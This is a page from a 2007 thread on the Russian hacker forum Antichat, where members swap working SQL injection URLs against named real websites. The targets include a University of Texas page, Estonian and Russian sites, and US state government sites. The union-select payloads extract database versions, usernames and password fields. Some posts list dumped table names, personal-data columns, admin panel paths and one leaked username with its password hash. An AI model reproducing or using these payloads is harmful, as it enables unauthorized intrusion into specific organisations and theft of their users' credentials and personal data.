ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2111  
Старый 02.05.2007, 18:31
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Очень красивая иньекция на сайте- The University of Texas at Austin

Код:
http://www.utexas.edu/studentgov/legislation/version.php?id=-573+union+select+1,2,3,version(),password,6,7,user,char(58),10+from+users/*
Короче классика, пассы чистые, лимит вам в помощь
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

sql-inj
  #2112  
Старый 02.05.2007, 19:45
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-inj

Мужики - зацените:

www.rudn-kvn.ru одна из моих любимых команд КВН )

уязвимость: http://rudn-kvn.ru/gastroli.shtml?ul=10&uld=78'

кавычку оставляем, смотрим версию -
Цитата:
http://rudn-kvn.ru/gastroli.shtml?ul=10&uld=-78'+union+select+1,2,aes_decrypt(aes_encrypt(conca t_ws(0x3a,user(),version(),database()),0x55),0x55) ,4,5/*
пятерка! смотрим таблицы:
Цитата:
http://rudn-kvn.ru/gastroli.shtml?ul=10&uld=-78'+union+select+1,2,aes_decrypt(aes_encrypt(conca t_ws(0x3a,table_name),0x55),0x55),4,5+from+informa tion_schema.tables+limit+20,1/*
интересные таблицы и некоторые поля к ним: banner_users (register,userpass,username,id) ,konkurs_user(tel,city,country,email,name,passwd,user_id), sde_register_users(icq,tel,post,name,email,passwd,login,user_id)
Таблиц под 50, есть и интересные.
Есть форум
Есть админка
Цитата:
http://rudn-kvn.ru/admin/
ps.отправил багрепорт админу.

Последний раз редактировалось Серенький; 02.05.2007 в 21:23..
 
Ответить с цитированием

  #2113  
Старый 02.05.2007, 20:12
muse
Новичок
Регистрация: 25.09.2005
Сообщений: 29
Провел на форуме:
104355

Репутация: 9
По умолчанию

вот чуть собралось за пару дней серфа


http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-1+union+select+1,email,3,4,5,6,7,8,9,10,11,12,13,1 4,pass,16,17,18,19,20,21,22,23+from+nuke_users+whe re+uid=2&mode=chrono&order=0
http://www.keckobservatory.org/article.php?id=99
http://anmeldung.iao.fraunhofer.de/veranstaltung.php?id=-1%20union%20select%201,2,3,4,5,6,7,user,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 ,63,64%20from%20mysql.user/*
http://www.updalles.ro/page.php?p=0&s=0&c=16%20and%201=0%20union%20select %20username,2,password,4,5,6,7,8,9%20from%20users
http://www.aeternazentaris.com/en/page.php?p=60&q=46%20and%201=0%20union%20select%20 1,2,username,password%20from%20users
http://www.antiquedealersca.com/memdisplay.php?memID=-1+union+select+1,memid,email,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22+from+members
http://www.affect.ru/portfolio/work.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,61,17,18,19,20,21,22,23,24,25,26+from+mysql.user/*
http://www.wincleaner.com/products/details.php?uid=-1%20union%20select%201,2,3,4,5,6,username,8,9,10,1 1,12,13,14,15,16,17,18,19,20,password,22%20from%20 users%20where%20uid=1
 
Ответить с цитированием

  #2114  
Старый 02.05.2007, 22:04
s1mt
Новичок
Регистрация: 18.04.2007
Сообщений: 15
Провел на форуме:
107912

Репутация: 22
По умолчанию

Походу должна быть скуля но не ковырял:
RU-HOST
http://www.ru-host.ru/texts.php?id=1+order+by+2/*
_______________________
http://zywienie.host.sk/articles.php?id=-4+union+select+1,version(),3,4,5,6,7
 
Ответить с цитированием

  #2115  
Старый 02.05.2007, 22:21
Solide Snake
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499

Репутация: 3702


Отправить сообщение для Solide Snake с помощью ICQ
По умолчанию

www.nukuteater.ee

Цитата:
http://www.nukuteater.ee/news.php?news_id=-1+union+select+1,2,VERSION(),4,5,6/*
http://www.nukuteater.ee/news.php?news_id=-1+union+select+1,2,USER(),4,5,6/*
http://www.nukuteater.ee/news.php?news_id=-1+union+select+1,2,DATABASE(),4,5,6/*
 
Ответить с цитированием

  #2116  
Старый 02.05.2007, 23:44
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
По умолчанию

Цитата:
Походу должна быть скуля но не ковырял:
RU-HOST
http://www.ru-host.ru/texts.php?id=1+order+by+2/*
http://www.ru-host.ru/texts.php?id=1+and+1=0+union+select+1,concat_ws(0x 3a,user(),version(),database())/*
 
Ответить с цитированием

cont
  #2117  
Старый 03.05.2007, 00:18
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow cont

Цитата:
www.nukuteater.ee

Цитата:
Цитата:http://www.nukuteater.ee/news.php?news_id=-1+union+select+1,2,VERSION(),4,5,6/*
http://www.nukuteater.ee/news.php?news_id=-1+union+select+1,2,USER(),4,5,6/*
http://www.nukuteater.ee/news.php?news_id=-1+union+select+1,2,DATABASE(),4,5,6/*
нашел users : username,password,id,name
1:kobin:7678614811d53c5b
Цитата:
http://www.nukuteater.ee/news.php?news_id=-246+union+select+1,2,concat_ws(0x3a,id,username,pa ssword,name),4,5,6+from+users+limit+0,1/*
contacts : id,name
news
админка
Цитата:
http://www.nukuteater.ee/admin/
 
Ответить с цитированием

  #2118  
Старый 03.05.2007, 10:28
nark0109
Новичок
Регистрация: 10.01.2007
Сообщений: 9
Провел на форуме:
52214

Репутация: 22
По умолчанию

http://sunrise.ru/contents.asp?reg=30&id='
сарай
 
Ответить с цитированием

  #2119  
Старый 03.05.2007, 12:29
stagediver
Новичок
Регистрация: 02.05.2007
Сообщений: 2
Провел на форуме:
40071

Репутация: 10
По умолчанию

Цитата:
Сообщение от Barney  
я не особо разбираюсь в скулях...
http://www.fasie.ru/index.php?rid=120'+UNION+SELECT+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20/*
лично я ничо не смог достать...=\
http://www.fasie.ru/index.php?rid=-100+union+select+1,2,username,4,5+from+phpbb_users +where+user_id=2/*
 
Ответить с цитированием

  #2120  
Старый 03.05.2007, 18:52
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

http://www.tam.ca.gov/view.php?id=-33%20union%20select%201,2,3,4/*
http://www.maineservicecommission.gov/MVF/article.php?ID=202%20union%20select%201,2,3,4,5,6, 7,8,9,10,11,12,13/*
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ